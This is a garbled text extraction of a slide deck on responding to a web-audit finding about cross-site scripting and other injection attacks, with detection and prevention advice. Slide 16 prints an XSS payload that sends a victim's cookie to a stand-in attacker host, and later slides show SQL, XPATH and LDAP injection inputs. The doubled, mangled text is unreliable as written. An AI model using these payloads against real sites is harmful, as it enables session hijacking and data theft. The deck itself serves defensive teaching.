web audit vulnerability

8/6/2019 Web Audit Vulnerability

1/34

Web Audit VulnerabilityWeb Audit Vulnerability

crosscross--site scripting (XSS) concernssite scripting (XSS) concerns

by Ron Widitzby Ron Widitz


2/34


3/34

Audit ResponseAudit Response

Either:Either:

Prove issue to be a nonProve issue to be a non--problemproblemoror

Describe actions to takeDescribe actions to take


4/34


5/34

Resolution StepsResolution Steps

Investigate security concernsInvestigate security concerns

Restate asIT

problem(s)Restate asIT

problem(s) Determine solution(s)Determine solution(s)

Provide audit responseProvide audit response

Mitigate riskMitigate risk


6/34

InvestigationInvestigation

Define crossDefine cross--site scripting (XSS)site scripting (XSS)

Ex

amine how auditors appliedEx

amine how auditors applied Identify risksIdentify risks

Research preliminary solutionsResearch preliminary solutions


7/34

crosscross--site scriptingsite scripting

Attacker goal: their code into browserAttacker goal: their code into browser

XSS forces a website to executeXSS forces a website to executemalicious code in browsermalicious code in browser

Browser user is the intended victimBrowser user is the intended victim

Why? Account hijacking, keystrokeWhy? Account hijacking, keystrokerecording, intranet hacking, theftrecording, intranet hacking, theft


8/34

XSS conceptXSS concept


9/34

Auditor findingAuditor finding

Freeform edit boxFreeform edit box

Message toMessage toCustomer ServiceCustomer Service


10/34

XSS typesXSS types

Immediate reflection : phishingImmediate reflection : phishing

DOMDOM--based : 95 JavaScript methodsbased : 95 JavaScript methods

Redirection : header, meta, dynamicRedirection : header, meta, dynamic

Multimedia : Flash, QT, PDF scriptsMultimedia : Flash, QT, PDF scripts

CrossCross--Site RequestForgery (CSR

F)Site Request

Forgery (CSR

F)

othersothers

(e.g. non(e.g. non--persistent search box)persistent search box)


11/34

RisksRisks

XSS abuses render engines or plugXSS abuses render engines or plug--insins

Steal browser cookiesSteal browser cookies Steal session info for replay attackSteal session info for replay attack

Malware or bot installationMalware or bot installation

Redirect or phishing attemptRedirect or phishing attempt


12/34

Our actual riskOur actual risk

Currently, none.Currently, none.

Edit box info viewed in thick clientEdit box info viewed in thick client

DHTML or JavaScript needs browserDHTML or JavaScript needs browser

Our thick client is Java SwingOur thick client is Java Swing--basedbased


13/34

Planned Audit ResponsePlanned Audit Response

Could indicate no audit problemCould indicate no audit problem

Might have future impactMight have future impact

Address through dev standardsAddress through dev standards

Consider application firewallConsider application firewall

Widen problem scope to include allWiden problem scope to include alluser agent injection tacticsuser agent injection tactics


14/34

More on Web AttacksMore on Web Attacks

Cross Site ScriptingCross Site Scripting

SQL InjectionSQL Injection

XPATH InjectionXPATH Injection

LDAP InjectionLDAP Injection

SSI

(server side inclusion)InjectionSS

I(server side inclusion)

Injection

JSP (Java server pages) InjectionJSP (Java server pages) Injection


15/34

ArtifactsArtifacts

For each injection issue:For each injection issue:

Vulnerability description documentedVulnerability description documented

Preventative coding techniquePreventative coding technique

Discuss with App Dev teamsDiscuss with App Dev teams

Publish and socialize directionPublish and socialize direction

Include in peer reviews/code walkthroughsInclude in peer reviews/code walkthroughs

Set deadlines for full incorporationSet deadlines for full incorporation

Communicate with auditorsCommunicate with auditors


16/34


Example 1Example 1 Trudy posts the following JavaScript on aTrudy posts the following JavaScript on a

message board:message board:

document.location='http://trudyhost/cgidocument.location='http://trudyhost/cgi--bin/bin/stealcookie.cgi?'+document.cookiestealcookie.cgi?'+document.cookie

When Bob views the posted message, hisWhen Bob views the posted message, hisbrowser executes the malicious script, andbrowser executes the malicious script, andhis session cookie is sent to Trudyhis session cookie is sent to Trudy


17/34


Example 2Example 2 Trudy sends a link to the following URL to Bob thatTrudy sends a link to the following URL to Bob that

will take him to a personalized page:will take him to a personalized page:

http://host/personalizedpage.php?username=


18/34


DetectionDetection A client usually is not supposed to sendA client usually is not supposed to send

scripts to serversscripts to servers

If the server receives or theIf the server receives or thehex equivalent in an incoming packet andhex equivalent in an incoming packet andthat same script is sent unsanitized in anthat same script is sent unsanitized in anoutgoing packet or in an outgoing SQLoutgoing packet or in an outgoing SQLstatement to the database, then an attackstatement to the database, then an attackhas occurredhas occurred

A sanitized script could look likeA sanitized script could look like

&ls;SCRIPT>&ls;SCRIPT>


19/34

SQL Injection ExampleSQL Injection Example

Trudy accesses Bobs website; in which he does notTrudy accesses Bobs website; in which he does notvalidate input on his sign in formvalidate input on his sign in form

Runs a SQL statement like the following:Runs a SQL statement like the following:

SELECT

* fromA

ccounts where username =SELECT

* fromA

ccounts where username =USER_NAME and password = USER_PASS;USER_NAME and password = USER_PASS;

In the password field, she types as her password:In the password field, she types as her password:

X OR x=xX OR x=x

Manipulates the server into running the following SQLManipulates the server into running the following SQL

command:command: SELECT * from Accounts where username =SELECT * from Accounts where username =

USER_NAME and password=X OR x=x;USER_NAME and password=X OR x=x;

Selects all account informationSelects all account information


20/34

SQL Injection DetectionSQL Injection Detection

To detect and prevent this at BobsTo detect and prevent this at Bobslocationlocation

Log any traffic from Trudy to BobLog any traffic from Trudy to Bobcontaining form data containing acontaining form data containing aquotation markquotation mark

Match any outgoing SQL statements fromMatch any outgoing SQL statements from

Bobs web server to his database serverBobs web server to his database serverand verify that the quotation marks Trudyand verify that the quotation marks Trudysupplied were escapedsupplied were escaped

If they werent, take actionIf they werent, take action


21/34

XPATH Injection ExampleXPATH Injection Example

Similar to SQL injectionSimilar to SQL injection

Bob has a form that does not sanitize userBob has a form that does not sanitize user--

provided input before using it as part of anprovided input before using it as part of anXPATH query::XPATH query:: string(//user[name/text()=USER_NAME' andstring(//user[name/text()=USER_NAME' and

password/text()=USER_PASS']/account/text())password/text()=USER_PASS']/account/text())

Trudy again can provide the following

Trudy again can provide the followingpassword to change the statements logic:password to change the statements logic:

X OR x=xX OR x=x

The statement thus selects the first accountThe statement thus selects the first account


22/34

LDAP Injection ExampleLDAP Injection Example

Server using LDAP for authenticationServer using LDAP for authentication User name initialized, but then usesUser name initialized, but then uses

unchecked user input to create a queryunchecked user input to create a queryfilter = "(uid=" + CStr(userName) + ")" 'filter = "(uid=" + CStr(userName) + ")" '

searching for the user entrysearching for the user entry

A

ttacker can ex

ploit using specialA

ttacker can ex

ploit using specialcharacterscharacters

http://example/ldapsearch.asp?user=*http://example/ldapsearch.asp?user=*


23/34

LDAP Injection DetectionLDAP Injection Detection

Detection is based off of usage ofDetection is based off of usage ofspecial LDAP charactersspecial LDAP characters

System monitors input for specialSystem monitors input for specialcharacterscharacters

Either scrubs incoming input or watchesEither scrubs incoming input or watches

for unescaped output passed to databasefor unescaped output passed to databaseserverserver

Detection approach is blackboxDetection approach is blackbox


24/34

SSIInjection ExampleSSIInjection Example

Bob has his server configured to use ServerBob has his server configured to use Server--Side IncludesSide Includes

Trudy passes input with an SSI embeddedTrudy passes input with an SSI embedded>

SSI inserts malicious code into normalSSI inserts malicious code into normal

webpages upon next requestwebpages upon next request

Future legitimate users get contentFuture legitimate users get contentcontaining the tainted code included by thecontaining the tainted code included by theSSISSI


25/34

SSIInjection DetectionSSIInjection Detection

Bobs system needs SSI enabled, so heBobs system needs SSI enabled, so heuses our system on local serversuses our system on local servers

SSI code can be detected by its specificSSI code can be detected by its specificformatformat HTML comment () containing a command>) containing a command

SSI commands can be stripped on ingressSSI commands can be stripped on ingress

Can also deny outgoing packets that do notCan also deny outgoing packets that do notinclude SSI as inputted (means successfulinclude SSI as inputted (means successfulexecution)execution)



26/34

JSP Injection ExampleJSP Injection Example

Similar to SSI injectionSimilar to SSI injection

Bob has a portal server configured toBob has a portal server configured touse dynamic code for templatesuse dynamic code for templates

Trudy passes input with an embeddedTrudy passes input with an embedded

malicious code inserted into webpagemalicious code inserted into webpage


27/34

JSP Injection PreventionJSP Injection Prevention

Prefer static include Prefer static include

Dont allow file inclusion outside ofDont allow file inclusion outside of

server via Java2 Security policiesserver via Java2 Security policies Firewall rules to prevent outboundFirewall rules to prevent outbound

requests from serverrequests from server

Input validation codingInput validation coding Choose portal software not requiringChoose portal software not requiring

dynamic includes or code executiondynamic includes or code execution


28/34

Defense ApproachesDefense Approaches

Web firewall/IDSWeb firewall/IDS ModSecurity for ApacheModSecurity for Apache

Commercial: SecureSphere fromCommercial: SecureSphere from

ImperviaImpervia Static code analysisStatic code analysis

Open source: NiktoOpen source: Nikto

Commercial:Commercial:

Acutenix Web Vulnerability ScannerAcutenix Web Vulnerability Scanner NN--stalkerstalker

Education on good codingEducation on good coding HTML encoding on input (serverHTML encoding on input (server--side)side)

Input validation/filteringInput validation/filtering


29/34

Q&AQ&A

Suggestions?Suggestions?


30/34


31/34


32/34

user agent injectionuser agent injection

StoredStored

HTTP Response SplittingHTTP Response Splitting

SQL InjectionSQL Injection

XML InjectionXML Injection

JSP CodeI

njectionJSP CodeI

njection LDAP InjectionLDAP Injection


33/34

ApproachesApproaches

Application firewallApplication firewall

HT

ML encoding on inputHT

ML encoding on input(server(server--side)side)

Input validation/filteringInput validation/filtering

Coding techniques with outputCoding techniques with output

Session key enforced toSession key enforced toprevent CSRFprevent CSRF


34/34

XPATH InjectionXPATH Injection

DetectionDetection Again, our system can detect this byAgain, our system can detect this by

matching any submission by Trudymatching any submission by Trudy

containing a quotation mark againstcontaining a quotation mark againstoutbound XPATH queriesoutbound XPATH queries

Correction can again be done byCorrection can again be done byescaping any rogue quotation marksescaping any rogue quotation marksTrudy may have insertedTrudy may have inserted


web audit vulnerability

Documents